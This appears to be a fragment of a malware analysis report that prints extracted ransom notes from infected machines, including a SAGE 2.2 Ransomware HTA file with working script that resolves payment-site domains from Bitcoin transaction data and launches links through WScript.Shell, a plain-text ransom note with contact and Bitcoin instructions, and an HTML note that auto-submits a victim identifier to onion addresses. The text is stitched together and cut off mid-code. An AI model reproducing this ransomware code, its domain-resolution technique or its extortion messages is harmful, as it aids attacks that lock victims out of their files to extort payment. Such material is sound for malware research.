c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/Acyg4l6BhvWLA76oRTE5CCUGOTBABS4_2ADUs0avuLKWa5JkGz6_PU7A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-ar' > الملف الذي كنت بصدد فتحه وبعض الملفات المهمة على حاسوبك تم تشفيرها "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که شما تلاش کردید بازکنید و فایل های کامپیوتر شما رمزگذاری شده است "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2> <h2 class='l l-en' style='display:block'>Action required to restore your files.</h2><h2 class='l l-de' >Aktion erforderlich, um ihre Daten wiederherzustellen.</h2><h2 class='l l-it' >Azione necessaria per ripristinare i file.</h2><h2 class='l l-pt' >O que você deve fazer para restaurar seus arquivos.</h2><h2 class='l l-es' >Se requiere una acción para restaurar sus archivos.</h2><h2 class='l l-fr' >Action requise pour restaurer vos fichiers.</h2><h2 class='l l-kr' >파일을 복원하는 데 필요한 작업.</h2><h2 class='l l-nl' >Aktie vereist om je bestanden te herstellen.</h2><h2 class='l l-ar' > الإجراءات المطلوبة لاستعادة الملفات الخاصة بك.</h2><h2 class='l l-fa' >برای بازگرداندن فایل های خود را اقدام کنید.</h2><h2 class='l l-zh' >要恢复文件需要进行解密。</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys links'> <div class='key'> <a href="http://7gie6ffnk
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Path

C:\Program Files (x86)\Adobe\Reader 9.0\Esl\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT

Ransom Note
__________________________________________________________________________________________________ | | | *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS *** | |__________________________________________________________________________________________________| Your files are now encrypted! -----BEGIN PERSONAL IDENTIFIER----- +4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1O UZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeI KZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6 VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC 8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA -----END PERSONAL IDENTIFIER----- Your important documents, databases, documents, network folders are encrypted for your PC security problems. No data from your computer has been stolen or deleted. Follow the instructions to restore the files. How to get the automatic decryptor: 1) Contact us by e-mail: [email protected]. In the letter, indicate your personal identifier (look at the beginning of this document) and the external ip-address of the computer on which the encrypted files are located. 2) After answering your request, our operator will give you further instructions that will show what to do next (the answer you will receive as soon as possible) ** Second email address [email protected] Free decryption as guarantee! Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 5Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.). __________________________________________________________________________________________________ | | | How to obtain Bitcoins? | | | | * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click | | 'Buy bitcoins', and select the seller by payment method and price: | | https://localbitcoins.com/buy_bitcoins | | * Also you can find other places to buy Bitcoins and beginners guide here: | | http://www.coindesk.com/information/how-can-i-buy-bitcoins | | | |__________________________________________________________________________________________________| __________________________________________________________________________________________________ | | | Attention! | | | | * Do not rename encrypted files. | | * Do not try to decrypt your data using third party software, it may cause permanent data loss. | | * Decryption of your files with the help of third parties may cause increased price | | (they add their fee to our) or you can become a victim of a scam. | | | |__________________________________________________________________________________________________|

Extracted

Path

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note
<html> <head> <title>How can I recover my files?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key?</h3> <p> First, you'll need to synchronize your computer with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your computer and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your computer with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST"> <input type="hidden" name="infection" value="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"> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <p> Instructions to install Tor Browser (recommended). </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/NNYJZAHP_BA887275DA208E5B6522DF69/</span></li> </ol> </div> <div class="box"> <p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/NNYJZAHP_BA887275DA208E5B6522DF69/">http://lockerrwhuaf2jjx.onion.sx/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/NNYJZAHP_BA887275DA208E5B6522DF69/">http://lockerrwhuaf2jjx.onion.link/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/NNYJZAHP_BA887275DA208E5B6522DF69/">https://lockerrwhuaf2jjx.onion.rip/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/NNYJZAHP_BA887275DA208E5B6522DF69/">https://lockerrwhuaf2jjx.onion.to/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want to synchronize your computer now?')) { document.infection_form.submit(); } } </script> </html>

Extracted

Path

C:\ProgramData\Adobe\Updater6\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', 